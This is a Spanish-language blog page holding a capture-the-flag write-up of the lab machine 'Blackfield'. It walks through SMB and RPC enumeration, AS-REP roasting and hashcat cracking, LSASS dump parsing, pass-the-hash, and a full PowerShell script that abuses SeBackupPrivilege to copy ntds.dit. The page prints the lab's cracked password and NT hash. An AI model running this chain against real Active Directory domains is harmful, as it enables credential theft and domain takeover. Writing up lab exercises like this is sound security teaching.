<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        TheFirstAvenger
    </title>
    <meta name="description" content= Queremos seguir aprendiendo y compartir nuestra passion por la Ciberseguridad >
    <meta name="keywords" content= windows, linux, CVE, vulnerabilidades, seguridad, ciberseguridad, hacking, pentest, pentesting, red team, hacking web, cheat sheet, OSCP, OSCE, pentesters >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.1"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            Blackfiel Writeup
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1><a href="#enumeracion" class="header-anchor">#</a><span id="enumeracion">Enumeración</span></h1><p>Enumeración de puertos </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -p- --open -v -n -T5 -Pn 10.10.10.102</span><br></pre></td></tr></table></figure>

<p>Enumeracion con el script por defecto con los puertos obtenidos del escaneo anterior.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sC -sV -p53,445,135,5985,88,389,3268 -oN allports -Pn blackfield.htb</span><br></pre></td></tr></table></figure>

<blockquote>
<p>PORT     STATE SERVICE       VERSION<br>53/tcp   open  domain?<br>| fingerprint-strings:<br>|   DNSVersionBindReqTCP:<br>|     version<br>|_    bind<br>88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-20 22:32:15Z)<br>135/tcp  open  msrpc         Microsoft Windows RPC<br>389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)<br>445/tcp  open  microsoft-ds?<br>3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)<br>5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)<br>|_http-server-header: Microsoft-HTTPAPI/2.0<br>|_http-title: Not Found<br>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <a href="https://nmap.org/cgi-bin/submit.cgi?new-service" target="_blank" rel="noopener">https://nmap.org/cgi-bin/submit.cgi?new-service</a> :<br>SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEE2BD1%P=x86_64-pc-linux-gnu%r(DNSV<br>SF:ersionBindReqTCP,20,”\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version<br>SF:x04bind\0\0\x10\0\x03”);<br>Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</p>
</blockquote>
<blockquote>
<p>Host script results:<br>|<em>clock-skew: 7h00m49s<br>| smb2-security-mode:<br>|   2.02:<br>|</em>    Message signing enabled and required<br>| smb2-time:<br>|   date: 2020-06-20T22:34:36<br>|_  start_date: N/A</p>
</blockquote>
<p>Vemos que hay el puerto 445 abierto, hacemos un null session para listar los directiorios y obtenemos la siguiente respuesta:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient -L &#x2F;&#x2F;10.10.10.192 -N_</span><br></pre></td></tr></table></figure>

<blockquote>
<pre><code> Sharename       Type      Comment
---------       ----      -------
 ADMIN$          Disk      Remote Admin
 C$              Disk      Default share
 forensic        Disk      Forensic / Audit share.
 IPC$            IPC       Remote IPC
 NETLOGON        Disk      Logon server share
 profiles$       Disk
 SYSVOL          Disk      Logon server share</code></pre></blockquote>
<p>El siguiente passo és enumerar esos directorios para hacerlo utilizaremos ==smbclient \\&lt;IP<i>&gt;\&lt;Directorio<d>&gt; -N==</d></i></p>
<p>Peró queremos automatizarlo por no ir uno a uno para ello creamos el siguiente script en bash muy basico. </p>
<p>Una vez listado los directorios creamos un pequeño script para guardarlos en un fixero. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient -L //10.10.10.192/ -N &gt; f.txt &amp;&amp; cat f.txt | awk <span class="string">'&#123;print $1&#125;'</span> | tail -n +4 &gt; folders.txt &amp;&amp; rm f.txt</span><br></pre></td></tr></table></figure>

<p>Y vemos y listamos todos los que tenemos permisos. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> fol <span class="keyword">in</span> $(cat folders.txt); <span class="keyword">do</span> <span class="built_in">echo</span> -n <span class="string">"Try: <span class="variable">$fol</span> - \n"</span>; smbclient //10.10.10.192/<span class="variable">$fol</span> -c dir -N;<span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<p>Vemos una larga lista de los usuarios asi que lo guardamos en un documento para hacer fuerza bruta y enumerar. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient //10.10.10.192/profiles$ -N -c dir &gt; tempusers.txt; cat tempusers.txt | awk <span class="string">'&#123;print $1&#125;'</span> &gt; users.txt; rm tempusers.txt</span><br></pre></td></tr></table></figure>

<p>Ahora con un bucle for probamos haber los usuarios que existen y si alguno se puede loguear con null session.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="keyword">for</span> user <span class="keyword">in</span> $(cat users.txt); <span class="keyword">do</span></span><br><span class="line"></span><br><span class="line">	msn=$(rpcclient 10.10.10.192 -U <span class="variable">$user</span> -N | tail -1)</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span> [[ $(<span class="built_in">echo</span> <span class="string">"<span class="variable">$msn</span>"</span> | grep -v <span class="string">"ACCESS_DENIED"</span>) ]]; <span class="keyword">then</span></span><br><span class="line">        	<span class="built_in">echo</span> <span class="string">"User exist: <span class="variable">$user</span>"</span></span><br><span class="line">    <span class="keyword">fi</span></span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<p>El output és el siguiente, vemos que ninguno de ellos és possible tener una session nula.</p>
<blockquote>
<p><em>User exist: audit2020</em><br><em>User exist: support</em><br><em>User exist: svc_backup</em></p>
</blockquote>
<h1><a href="#user-1-support" class="header-anchor">#</a><span id="user-1-support">USER 1 : support</span></h1><p>Los metemos en un fichero, que se llamara users.txt.<br>Utilizaremos el script GetNPUser.py_, para lograr los tickets de kerberos que no necessita preautentificación. <a href="https://www.hackingarticles.in/abusing-kerberos-using-impacket/" target="_blank" rel="noopener"> Clica para más información </a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -request -dc-ip 10.10.10.192</span><br></pre></td></tr></table></figure>


<blockquote>
<p>$krb5asrep$23$support@BLACKFIELD.LOCAL:f72434fff2bed49682c2566af5b92e1d$62bd6347ae54e6f0172703c53c383b0afed413e3396f6b79d1315e58f8817f04e316ca720cdb6faf15e4049fa822fb5d5c0069d1db841a30fb0bb7bfb599f5f88ee0305eb3ef87e8121a18def9e4e5a3756e9d39a76978dfee3127ef40684b646e28eea5bd7ed0a6180ac3572a97650c8ed499275b27785e437d7e81679fb6582e4c7212497509eb59fe67088cea8414131a885449928aca9ae9a780e51a8acb96993311ee0d042a47ac5e3f29b24044adff29f6dbeb5b2bea6e3a7b65b4c034e4fa99f0bfc85bf9c60758997522d7f50abf5edab22778bafb2d27439fa2897280460cf2b7aee9b7738a2bf2d094b054f9aaf039`</p>
</blockquote>
<p>Guardamos este output en un archivo llamado support.hash y con hashcat procedemos a lograr la contraseña de kerbereos. <a href="https://github.com/frizb/Hashcat-Cheatsheet#cracking-hashes-from-kerboroasting---krb5tgs" target="_blank" rel="noopener">Hashcat Cheat sheet</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 18200 -a 0 -w 3 support.hash /usr/share/wordlists/rockyou.txt --force</span><br></pre></td></tr></table></figure>
<p>Obtenemos la siguiente respuesta<br><code>#00^BlackKnight</code></p>
<h1><a href="#user-2-audit2020" class="header-anchor">#</a><span id="user-2-audit2020">USER 2 : audit2020</span></h1><p>Vemos que tenemos acceso desde rpcclient y los permisos que tenemos como usuario nos permite cambiar la password RPC del user audit2020, primero introduciendo la nueva contraseña del usuario y luego la del usuario support. </p>
<p><img src="https://i.imgur.com/RsFzDEt.png" alt></p>
<h1><a href="#user-3-svc-backup" class="header-anchor">#</a><span id="user-3-svc-backup">USER 3 : svc_backup</span></h1><p>Ahora tenemos de nuevo accesos a mas directiorios del samba concretamente al forensics.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient \\\\10.10.10.192\\forensic --user=audit2020%Test1234 -c <span class="string">'prompt OFF;recurse ON; cd memory_analysis; mget *'</span></span><br></pre></td></tr></table></figure>

<p>Vemos que hay un zip que se llama lssa descomprimimos y podemos ver credenciales dentro. Con lo siguiente: </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pypykatz lsa minidump lsass.DMP</span><br></pre></td></tr></table></figure>

<p>Como información importante e interesante encontramos esto. </p>
<blockquote>
<p>== MSV ==<br>        Username: svc_backup<br>        Domain: BLACKFIELD<br>        LM: NA<br>        NT: 9658d1d1dcd9250115e2205d9f48400d<br>        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c</p>
</blockquote>
<p>Vemos directamente que és possible loguearnos haciendo un pass de hash en evil-winrm </p>
<p><img src="https://i.imgur.com/UBkhp59.png" alt></p>
<h1><a href="#escalacion-de-privilegios-administrator" class="header-anchor">#</a><span id="escalacion-de-privilegios-administrator">Escalación de privilegios : Administrator</span></h1><p>Hacemos la enumeración basica para escalación de privilegios.</p>
<p>Iniciamos con un ==whoami /all== y vemos información interesante en los privilegios. </p>
<p><img src="https://i.imgur.com/Oz4ITL8.png" alt></p>
<h2><a href="#preparacion-del-exploit" class="header-anchor">#</a><span id="preparacion-del-exploit">Preparación del exploit</span></h2><p>Buscamos como extraer el archivo NTDS.dit y el registro del sistema ya que nuestro usuario tiene permisos de backup.<br>El script que usamos es necessario <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow" target="_blank" rel="noopener">DiskShadow</a> para copiar y extraer información al volumen Shadow.</p>
<p>Para abusar de este script primero es necessario tener descargado estos dos dll que los encontramos en el repositorio <em><a href="https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug" target="_blank" rel="noopener">https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug</a></em></p>
<p>A mi personalmente me gusta crear un directiorio temporal para ser el menos visible y asi és mucho más fàcil trabajar desde allí.</p>
<p>Subimos los archivos en ese directorio. </p>
<p><img src="https://i.imgur.com/Ww2qr7Y.png" alt></p>
<p>Y ahora nos descargamos el siguiente script automatizado para lograr la escalación de privilegios. <a href="https://raw.githubusercontent.com/return-z/SeBackupPrivilege-Abuse/master/SeBackupPrivAbuse.ps1" target="_blank" rel="noopener">SeBackupPrivAbuse.ps1</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#PS Script to use the SeBackupPrivilege for extracting the ntds.dit file and reg system file</span></span><br><span class="line"><span class="comment">#Purely for educational purposes. Illegal purposes are not intended.</span></span><br><span class="line"><span class="comment">#Not completely my ideas. Taken from a few sources and put together in one place.</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$current_path</span> = <span class="built_in">Get-Location</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Uncomment the lines below if https connenction is allowed or working, otherwise download the dlls and save on the machine</span></span><br><span class="line"><span class="comment">#Invoke-WebRequest -Uri "https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll" -OutFile "SeBackupPrivilegeUtils.dll"</span></span><br><span class="line"><span class="comment">#Invoke-WebRequest -Uri "https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll" -OutFile "SeBackupPrivilegeCmdLets.dll"</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">Import-Module</span> .\SeBackupPrivilegeUtils.dll</span><br><span class="line"><span class="built_in">Import-Module</span> .\SeBackupPrivilegeCmdLets.dll</span><br><span class="line"><span class="built_in">Set-SeBackupPrivilege</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#set ACL in the windows folder</span></span><br><span class="line"><span class="variable">$path</span> = <span class="string">"C:\windows\"</span></span><br><span class="line"><span class="variable">$user</span> = <span class="string">"DOMAIN\USER"</span>     <span class="comment">#EDIT THIS LINE BEFORE USAGE</span></span><br><span class="line"><span class="variable">$acl</span> = <span class="built_in">get-acl</span> <span class="literal">-Path</span> <span class="variable">$path</span></span><br><span class="line"><span class="variable">$acl_rule</span> = <span class="variable">$user</span>,<span class="string">'FullControl'</span>,<span class="string">'ContainerInherit,ObjectInherit'</span>,<span class="string">'None'</span>,<span class="string">'Allow'</span></span><br><span class="line"><span class="variable">$access_rule</span> = <span class="built_in">New-Object</span> System.Security.AccessControl.FileSystemAccessRule <span class="variable">$acl_rule</span></span><br><span class="line"><span class="variable">$acl</span>.AddAccessRule(<span class="variable">$access_rule</span>)</span><br><span class="line"><span class="built_in">Set-Acl</span> <span class="literal">-Path</span> <span class="variable">$path</span> <span class="literal">-AclObject</span> <span class="variable">$acl</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Creating a script file for DiskShadow</span></span><br><span class="line"><span class="string">"set metadata C:\windows\temp\metadata.cab"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii</span><br><span class="line"><span class="string">"set context persistent nowriters"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"><span class="string">"begin backup"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"><span class="string">"add volume c: alias mydrive"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"><span class="string">"create"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"><span class="string">"expose %mydrive% k:"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#Using DiskShadow to get create a Volume Shadow Copy</span></span><br><span class="line">cd /windows/system32</span><br><span class="line">cmd /c <span class="string">"diskshadow.exe /s <span class="variable">$current_path</span>\\script.txt"</span></span><br><span class="line"><span class="built_in">Copy-FileSeBackupPrivilege</span> k:\windows\ntds\ntds.dit <span class="variable">$current_path</span>\\ntds.dit <span class="literal">-Overwrite</span></span><br><span class="line">cd <span class="variable">$current_path</span></span><br><span class="line">del script.txt</span><br><span class="line"></span><br><span class="line"><span class="comment">#Cleanup </span></span><br><span class="line"><span class="string">"delete shadows exposed k:"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line"><span class="string">"exit"</span> | <span class="built_in">Out-File</span> script.txt <span class="literal">-encoding</span> ascii <span class="literal">-append</span></span><br><span class="line">cd /windows/system32</span><br><span class="line">cmd /c <span class="string">"diskshadow.exe /s <span class="variable">$current_path</span>\\script.txt"</span></span><br><span class="line">cd <span class="variable">$current_path</span></span><br><span class="line">del script.txt</span><br><span class="line"></span><br><span class="line"><span class="comment">#Get the system registry hive</span></span><br><span class="line">cmd /c <span class="string">"reg.exe save hklm\system .\system.bak"</span></span><br></pre></td></tr></table></figure>
<p>Ahora obtendremos los dos ficheros, los descargamos para poder<br>obtener el hash Administrador, utilizando SecretsDump.py_.</p>
<p><img src="https://i.imgur.com/bz5s05Q.png" alt></p>
<p>Accedemos al user Administrator y obtenemos la flag del root.</p>
<p><img src="https://i.imgur.com/bqzx0ig.png" alt><br></p>

    </div>

    
</div>

    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: J4ck21 | Theme By <a class="theme-author" href="https://github.com/Xunzhuo/hexo-theme-coder" target="_blank" rel="noopener" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="NOsswOncKgc8HOxqo9oxIWlX-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="z1FihjWEbS8uIfUQdmCtK7zz">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
